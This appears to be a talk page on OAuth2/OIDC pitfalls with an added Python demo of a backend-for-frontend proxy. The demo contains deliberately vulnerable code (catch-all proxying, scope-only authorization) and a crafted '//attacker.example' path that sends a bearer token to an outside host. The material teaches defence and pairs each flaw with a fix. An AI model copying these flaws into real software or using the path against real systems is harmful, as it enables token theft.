OAuth2/OIDC security weaknesses and pitfalls - Tobias Ahnoff & Pontus Hanssen

 Published On Mar 26, 2024

This talk was recorded at NDC Security in Oslo, Norway. #ndcsecurity #ndcconferences #security #developer #softwaredeveloper

Attend the next NDC conference near you:
https://ndcconferences.com
https://ndc-security.com/



Best current practices (BCPs) for implementing OAuth2 and OIDC have changed many times over the years. Even when following the BCPs it is still easy to make mistakes, and you might end up with a weak or even broken implementation.

Based on our experiences performing penetration tests and security reviews, this presentation will show common OAuth2/OIDC security weaknesses and pitfalls.

In particular, it covers the BFF (backend-for-frontend) pattern and why it is bad practice to combine reverse-proxy catch-all routing, an OAuth2 client with access to many scopes, and APIs that authorize based on nothing more than a valid token and its scopes. Does your BFF enable authenticated SSRF as a Service?

During the presentation, we will demonstrate both attacks and defences for an OAuth2/OIDC application running locally.
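The following is an added example for this page, not the speakers' demo application. It models the three ingredients the abstract warns about: a BFF whose browser session is bound to one access token, catch-all reverse-proxy routing of `/api/*` to the upstream, a client token carrying more scopes than the UI needs, and backend APIs that authorize on "valid token + scope" alone. Next to each weak piece sits its defence (an explicit route allow-list, and an API that also checks the resource owner or an explicit role). The upstream host, paths, users, scopes and token contents are all constructed for the demo; the host-takeover case relies on Python's `urllib.parse.urljoin` treating a leading `//host` as a network-path reference, which is one concrete way a catch-all proxy turns into SSRF with the user's token attached.

```python
"""Toy model of the BFF "authenticated SSRF as a Service" anti-pattern.

Added example (not from the talk). All hosts, paths, users and scopes are
constructed; the weak and hardened variants are shown side by side."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urljoin, urlsplit

API_BASE = "https://api.internal/"  # assumed upstream base URL

# Constructed access token held in alice's BFF session. The BFF's client was
# granted far more scopes than the browser UI needs ("client with many scopes").
ALICE_TOKEN = {"sub": "alice", "scope": "orders:read orders:write admin:read"}

# Constructed backend resources: path -> (required scope, owner; None = admin data)
BACKEND: Dict[str, Tuple[str, Optional[str]]] = {
    "/orders/1001": ("orders:read", "alice"),
    "/orders/2002": ("orders:read", "bob"),
    "/admin/users": ("admin:read", None),
}

Api = Callable[[str, dict], Tuple[int, str]]


@dataclass
class Result:
    status: int
    upstream: str  # where the BFF actually sent the token
    body: str = ""


def api_scope_only(path: str, token: dict) -> Tuple[int, str]:
    """Weak API: any valid token that carries the scope gets the data."""
    if path not in BACKEND:
        return 404, ""
    required, _owner = BACKEND[path]
    if required not in token["scope"].split():
        return 403, "insufficient_scope"
    return 200, f"data:{path}"


def api_scope_and_owner(path: str, token: dict) -> Tuple[int, str]:
    """Hardened API: scope is necessary but not sufficient. User data requires
    the subject to be the owner; admin data requires an explicit role claim."""
    if path not in BACKEND:
        return 404, ""
    required, owner = BACKEND[path]
    if required not in token["scope"].split():
        return 403, "insufficient_scope"
    if owner is None:
        return (200, f"data:{path}") if "admin" in token.get("roles", []) else (403, "role_required")
    if owner != token["sub"]:
        return 403, "not_resource_owner"
    return 200, f"data:{path}"


def send(upstream_url: str, token: dict, api: Api) -> Result:
    """Stand-in for the BFF's HTTP client: the token goes wherever the URL points."""
    parts = urlsplit(upstream_url)
    if parts.netloc != urlsplit(API_BASE).netloc:
        # The bearer token has left the trust boundary with the request.
        return Result(0, upstream_url, "token_exfiltrated")
    status, body = api(parts.path, token)
    return Result(status, upstream_url, body)


def bff_catch_all(browser_path: str, token: dict, api: Api) -> Result:
    """Anti-pattern: reverse-proxy everything under /api/ to the upstream."""
    if not browser_path.startswith("/api/"):
        return Result(404, "")
    rest = browser_path[len("/api/"):]
    # urljoin treats a leading "//host" as a network-path reference and swaps
    # the upstream host, so "/api///attacker.example/x" leaves api.internal.
    return send(urljoin(API_BASE, rest), token, api)


# Constructed allow-list: the only upstream routes the browser UI actually needs.
ALLOW_LIST = [
    (re.compile(r"^/api/orders/(\d+)$"), "orders/{0}"),
]


def bff_allow_list(browser_path: str, token: dict, api: Api) -> Result:
    """Defence: explicit route table; anything not listed is never proxied."""
    for pattern, target in ALLOW_LIST:
        match = pattern.match(browser_path)
        if match:
            return send(urljoin(API_BASE, target.format(*match.groups())), token, api)
    return Result(404, "")


if __name__ == "__main__":
    for path in ("/api/orders/1001", "/api/orders/2002", "/api/admin/users",
                 "/api///attacker.example/steal"):
        weak = bff_catch_all(path, ALICE_TOKEN, api_scope_only)
        hard = bff_allow_list(path, ALICE_TOKEN, api_scope_and_owner)
        print(f"{path:32} catch-all+scope-only -> {weak.status} {weak.body:22} "
              f"allow-list+owner -> {hard.status} {hard.body}")
```

With the weak combination, alice's session (or anyone who can drive it, for example through XSS or CSRF against the BFF) reads bob's order and the admin user list, and a crafted path sends her bearer token to a foreign host. The allow-list alone stops the unrouted paths and the host takeover; the owner check alone stops the cross-user read even through the catch-all. Both are needed, and the scope set granted to the BFF client should still be cut down to what the UI uses.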

